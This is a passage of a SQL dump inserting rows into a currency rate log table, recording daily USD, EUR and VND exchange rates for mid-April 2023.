(2437, 1, 'USD', 0.000000, 2, 'EUR', 0.907850, '2023-04-14'),
(2438, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2439, 2, 'EUR', 0.000000, 1, 'USD', 1.101500, '2023-04-14'),
(2440, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2441, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-14'),
(2442, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-14'),
(2443, 1, 'USD', 1.000000, 2, 'EUR', 0.907850, '2023-04-14'),
(2444, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2445, 2, 'EUR', 1.000000, 1, 'USD', 1.101500, '2023-04-14'),
(2446, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2447, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-14'),
(2448, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-14'),
(2449, 1, 'USD', 0.000000, 2, 'EUR', 0.907850, '2023-04-14'),
(2450, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2451, 2, 'EUR', 0.000000, 1, 'USD', 1.101500, '2023-04-14'),
(2452, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2453, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-14'),
(2454, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-14'),
(2455, 1, 'USD', 1.000000, 2, 'EUR', 0.907850, '2023-04-15'),
(2456, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2457, 2, 'EUR', 1.000000, 1, 'USD', 1.101500, '2023-04-15'),
(2458, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2459, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-15'),
(2460, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-15'),
(2461, 1, 'USD', 0.000000, 2, 'EUR', 0.904400, '2023-04-15'),
(2462, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2463, 2, 'EUR', 0.000000, 1, 'USD', 1.105700, '2023-04-15'),
(2464, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2465, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-15'),
(2466, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-15'),
(2467, 1, 'USD', 1.000000, 2, 'EUR', 0.904400, '2023-04-15'),
(2468, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2469, 2, 'EUR', 1.000000, 1, 'USD', 1.105700, '2023-04-15'),
(2470, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2471, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-15'),
(2472, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-15'),
(2473, 1, 'USD', 0.000000, 2, 'EUR', 0.904400, '2023-04-15'),
(2474, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2475, 2, 'EUR', 0.000000, 1, 'USD', 1.105700, '2023-04-15'),
(2476, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2477, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-15'),
(2478, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-15'),
(2479, 1, 'USD', 1.000000, 2, 'EUR', 0.904400, '2023-04-15'),
(2480, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2481, 2, 'EUR', 1.000000, 1, 'USD', 1.105700, '2023-04-15'),
(2482, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2483, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-15'),
(2484, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-15'),
(2485, 1, 'USD', 0.000000, 2, 'EUR', 0.904400, '2023-04-15'),
(2486, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2487, 2, 'EUR', 0.000000, 1, 'USD', 1.105700, '2023-04-15'),
(2488, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2489, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-15'),
(2490, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-15'),
(2491, 1, 'USD', 1.000000, 2, 'EUR', 0.904400, '2023-04-15'),
(2492, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2493, 2, 'EUR', 1.000000, 1, 'USD', 1.105700, '2023-04-15'),
(2494, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2495, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-15'),
(2496, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-15'),
(2497, 1, 'USD', 0.000000, 2, 'EUR', 0.904400, '2023-04-15'),
(2498, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2499, 2, 'EUR', 0.000000, 1, 'USD', 1.105700, '2023-04-15'),
(2500, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-15'),
(2501, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-15'),
(2502, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-15'),
(2503, 1, 'USD', 1.000000, 2, 'EUR', 0.904400, '2023-04-16'),
(2504, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2505, 2, 'EUR', 1.000000, 1, 'USD', 1.105700, '2023-04-16'),
(2506, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2507, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-16'),
(2508, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-16');
INSERT INTO `tblcurrency_rate_logs` (`id`, `from_currency_id`, `from_currency_name`, `from_currency_rate`, `to_currency_id`, `to_currency_name`, `to_currency_rate`, `date`) VALUES
(2509, 1, 'USD', 0.000000, 2, 'EUR', 0.904400, '2023-04-16'),
(2510, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2511, 2, 'EUR', 0.000000, 1, 'USD', 1.105700, '2023-04-16'),
(2512, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2513, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-16'),
(2514, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-16'),
(2515, 1, 'USD', 1.000000, 2, 'EUR', 0.904400, '2023-04-16'),
(2516, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2517, 2, 'EUR', 1.000000, 1, 'USD', 1.105700, '2023-04-16'),
(2518, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2519, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-16'),
(2520, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-16'),
(2521, 1, 'USD', 0.000000, 2, 'EUR', 0.904400, '2023-04-16'),
(2522, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2523, 2, 'EUR', 0.000000, 1, 'USD', 1.105700, '2023-04-16'),
(2524, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2525, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-16'),
(2526, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-16'),
(2527, 1, 'USD', 1.000000, 2, 'EUR', 0.904400, '2023-04-16'),
(2528, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2529, 2, 'EUR', 1.000000, 1, 'USD', 1.105700, '2023-04-16'),
(2530, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2531, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-16'),
(2532, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-16'),
(2533, 1, 'USD', 0.000000, 2, 'EUR', 0.904400, '2023-04-16'),
(2534, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2535, 2, 'EUR', 0.000000, 1, 'USD', 1.105700, '2023-04-16'),
(2536, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2537, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-16'),
(2538, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-16'),
(2539, 1, 'USD', 1.000000, 2, 'EUR', 0.904400, '2023-04-16'),
(2540, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2541, 2, 'EUR', 1.000000, 1, 'USD', 1.105700, '2023-04-16'),
(2542, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2543, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-16'),
(2544, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-16'),
(2545, 1, 'USD', 0.000000, 2, 'EUR', 0.904400, '2023-04-16'),
(2546, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2547, 2, 'EUR', 0.000000, 1, 'USD', 1.105700, '2023-04-16'),
(2548, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-16'),
(2549, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-16'),
(2550, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-16'),
(2551, 1, 'USD', 1.000000, 2, 'EUR', 0.904400, '2023-04-17'),
(2552, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2553, 2, 'EUR', 1.000000, 1, 'USD', 1.105700, '2023-04-17'),
(2554, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2555, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-17'),
(2556, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-17'),
(2557, 1, 'USD', 0.000000, 2, 'EUR', 0.904400, '2023-04-17'),
(2558, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2559, 2, 'EUR', 0.000000, 1, 'USD', 1.105700, '2023-04-17'),
(2560, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2561, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-17'),
(2562, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-17'),
(2563, 1, 'USD', 1.000000, 2, 'EUR', 0.904400, '2023-04-17'),
(2564, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2565, 2, 'EUR', 1.000000, 1, 'USD', 1.105700, '2023-04-17'),
(2566, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2567, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-17'),
(2568, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-17'),
(2569, 1, 'USD', 0.000000, 2, 'EUR', 0.904400, '2023-04-17'),
(2570, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2571, 2, 'EUR', 0.000000, 1, 'USD', 1.105700, '2023-04-17'),
(2572, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2573, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-17'),
(2574, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-17'),
(2575, 1, 'USD', 1.000000, 2, 'EUR', 0.904400, '2023-04-17'),
(2576, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2577, 2, 'EUR', 1.000000, 1, 'USD', 1.105700, '2023-04-17'),
(2578, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2579, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-17'),
(2580, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-17'),
(2581, 1, 'USD', 0.000000, 2, 'EUR', 0.904400, '2023-04-17'),
(2582, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2583, 2, 'EUR', 0.000000, 1, 'USD', 1.105700, '2023-04-17'),
(2584, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2585, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-17'),
(2586, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-17'),
(2587, 1, 'USD', 1.000000, 2, 'EUR', 0.904400, '2023-04-17'),
(2588, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2589, 2, 'EUR', 1.000000, 1, 'USD', 1.105700, '2023-04-17'),
(2590, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2591, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-17'),
(2592, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-17'),
(2593, 1, 'USD', 0.000000, 2, 'EUR', 0.904400, '2023-04-17'),
(2594, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2595, 2, 'EUR', 0.000000, 1, 'USD', 1.105700, '2023-04-17'),
(2596, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-17'),
(2597, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-17'),
(2598, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-17'),
(2599, 1, 'USD', 1.000000, 2, 'EUR', 0.904400, '2023-04-18'),
(2600, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2601, 2, 'EUR', 1.000000, 1, 'USD', 1.105700, '2023-04-18'),
(2602, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2603, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-18'),
(2604, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-18'),
(2605, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-04-18'),
(2606, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2607, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-04-18'),
(2608, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2609, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-18'),
(2610, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-18'),
(2611, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-04-18'),
(2612, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2613, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-04-18'),
(2614, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2615, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-18'),
(2616, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-18'),
(2617, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-04-18'),
(2618, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2619, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-04-18'),
(2620, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2621, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-18'),
(2622, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-18'),
(2623, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-04-18'),
(2624, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2625, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-04-18'),
(2626, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2627, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-18'),
(2628, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-18'),
(2629, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-04-18'),
(2630, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2631, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-04-18'),
(2632, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2633, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-18'),
(2634, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-18'),
(2635, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-04-18'),
(2636, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2637, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-04-18'),
(2638, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2639, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-18'),
(2640, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-18'),
(2641, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-04-18'),
(2642, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2643, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-04-18'),
(2644, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-18'),
(2645, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-18'),
(2646, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-18'),
(2647, 1, 'USD', 1.000000, 2, 'EUR', 0.910660, '2023-04-19'),
(2648, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2649, 2, 'EUR', 1.000000, 1, 'USD', 1.098100, '2023-04-19'),
(2650, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2651, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-19'),
(2652, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-19'),
(2653, 1, 'USD', 0.000000, 2, 'EUR', 0.911410, '2023-04-19'),
(2654, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2655, 2, 'EUR', 0.000000, 1, 'USD', 1.097200, '2023-04-19'),
(2656, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2657, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-19'),
(2658, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-19'),
(2659, 1, 'USD', 1.000000, 2, 'EUR', 0.911410, '2023-04-19'),
(2660, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2661, 2, 'EUR', 1.000000, 1, 'USD', 1.097200, '2023-04-19'),
(2662, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2663, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-19'),
(2664, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-19'),
(2665, 1, 'USD', 0.000000, 2, 'EUR', 0.911410, '2023-04-19'),
(2666, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2667, 2, 'EUR', 0.000000, 1, 'USD', 1.097200, '2023-04-19'),
(2668, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2669, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-19'),
(2670, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-19'),
(2671, 1, 'USD', 1.000000, 2, 'EUR', 0.911410, '2023-04-19'),
(2672, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2673, 2, 'EUR', 1.000000, 1, 'USD', 1.097200, '2023-04-19'),
(2674, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2675, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-19'),
(2676, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-19'),
(2677, 1, 'USD', 0.000000, 2, 'EUR', 0.911410, '2023-04-19'),
(2678, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2679, 2, 'EUR', 0.000000, 1, 'USD', 1.097200, '2023-04-19'),
(2680, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2681, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-19'),
(2682, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-19'),
(2683, 1, 'USD', 1.000000, 2, 'EUR', 0.911410, '2023-04-19'),
(2684, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2685, 2, 'EUR', 1.000000, 1, 'USD', 1.097200, '2023-04-19'),
(2686, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2687, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-19'),
(2688, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-19'),
(2689, 1, 'USD', 0.000000, 2, 'EUR', 0.911410, '2023-04-19'),
(2690, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2691, 2, 'EUR', 0.000000, 1, 'USD', 1.097200, '2023-04-19'),
(2692, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-19'),
(2693, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-19'),
(2694, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-19'),
(2695, 1, 'USD', 1.000000, 2, 'EUR', 0.911410, '2023-04-20'),
(2696, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2697, 2, 'EUR', 1.000000, 1, 'USD', 1.097200, '2023-04-20'),
(2698, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2699, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-20'),
(2700, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-20'),
(2701, 1, 'USD', 0.000000, 2, 'EUR', 0.914660, '2023-04-20'),
(2702, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2703, 2, 'EUR', 0.000000, 1, 'USD', 1.093300, '2023-04-20'),
(2704, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2705, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-20'),
(2706, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-20'),
(2707, 1, 'USD', 1.000000, 2, 'EUR', 0.914660, '2023-04-20'),
(2708, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2709, 2, 'EUR', 1.000000, 1, 'USD', 1.093300, '2023-04-20'),
(2710, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2711, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-20'),
(2712, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-20'),
(2713, 1, 'USD', 0.000000, 2, 'EUR', 0.914660, '2023-04-20'),
(2714, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2715, 2, 'EUR', 0.000000, 1, 'USD', 1.093300, '2023-04-20'),
(2716, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2717, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-20'),
(2718, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-20'),
(2719, 1, 'USD', 1.000000, 2, 'EUR', 0.914660, '2023-04-20'),
(2720, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2721, 2, 'EUR', 1.000000, 1, 'USD', 1.093300, '2023-04-20'),
(2722, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2723, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-20'),
(2724, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-20'),
(2725, 1, 'USD', 0.000000, 2, 'EUR', 0.914660, '2023-04-20'),
(2726, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2727, 2, 'EUR', 0.000000, 1, 'USD', 1.093300, '2023-04-20'),
(2728, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2729, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-20'),
(2730, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-20'),
(2731, 1, 'USD', 1.000000, 2, 'EUR', 0.914660, '2023-04-20'),
(2732, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2733, 2, 'EUR', 1.000000, 1, 'USD', 1.093300, '2023-04-20'),
(2734, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2735, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-20'),
(2736, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-20'),
(2737, 1, 'USD', 0.000000, 2, 'EUR', 0.914660, '2023-04-20'),
(2738, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2739, 2, 'EUR', 0.000000, 1, 'USD', 1.093300, '2023-04-20'),
(2740, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-20'),
(2741, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-20'),
(2742, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-20'),
(2743, 1, 'USD', 1.000000, 2, 'EUR', 0.914660, '2023-04-21'),
(2744, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2745, 2, 'EUR', 1.000000, 1, 'USD', 1.093300, '2023-04-21'),
(2746, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2747, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-21'),
(2748, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-21'),
(2749, 1, 'USD', 0.000000, 2, 'EUR', 0.913740, '2023-04-21'),
(2750, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2751, 2, 'EUR', 0.000000, 1, 'USD', 1.094400, '2023-04-21'),
(2752, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2753, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-21'),
(2754, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-21'),
(2755, 1, 'USD', 1.000000, 2, 'EUR', 0.913740, '2023-04-21'),
(2756, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2757, 2, 'EUR', 1.000000, 1, 'USD', 1.094400, '2023-04-21'),
(2758, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2759, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-21'),
(2760, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-21'),
(2761, 1, 'USD', 0.000000, 2, 'EUR', 0.913740, '2023-04-21'),
(2762, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2763, 2, 'EUR', 0.000000, 1, 'USD', 1.094400, '2023-04-21'),
(2764, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2765, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-21'),
(2766, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-21'),
(2767, 1, 'USD', 1.000000, 2, 'EUR', 0.913740, '2023-04-21'),
(2768, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2769, 2, 'EUR', 1.000000, 1, 'USD', 1.094400, '2023-04-21'),
(2770, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2771, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-21'),
(2772, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-21'),
(2773, 1, 'USD', 0.000000, 2, 'EUR', 0.913740, '2023-04-21'),
(2774, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2775, 2, 'EUR', 0.000000, 1, 'USD', 1.094400, '2023-04-21'),
(2776, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2777, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-21'),
(2778, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-21'),
(2779, 1, 'USD', 1.000000, 2, 'EUR', 0.913740, '2023-04-21'),
(2780, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2781, 2, 'EUR', 1.000000, 1, 'USD', 1.094400, '2023-04-21'),
(2782, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2783, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-21'),
(2784, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-21'),
(2785, 1, 'USD', 0.000000, 2, 'EUR', 0.913740, '2023-04-21'),
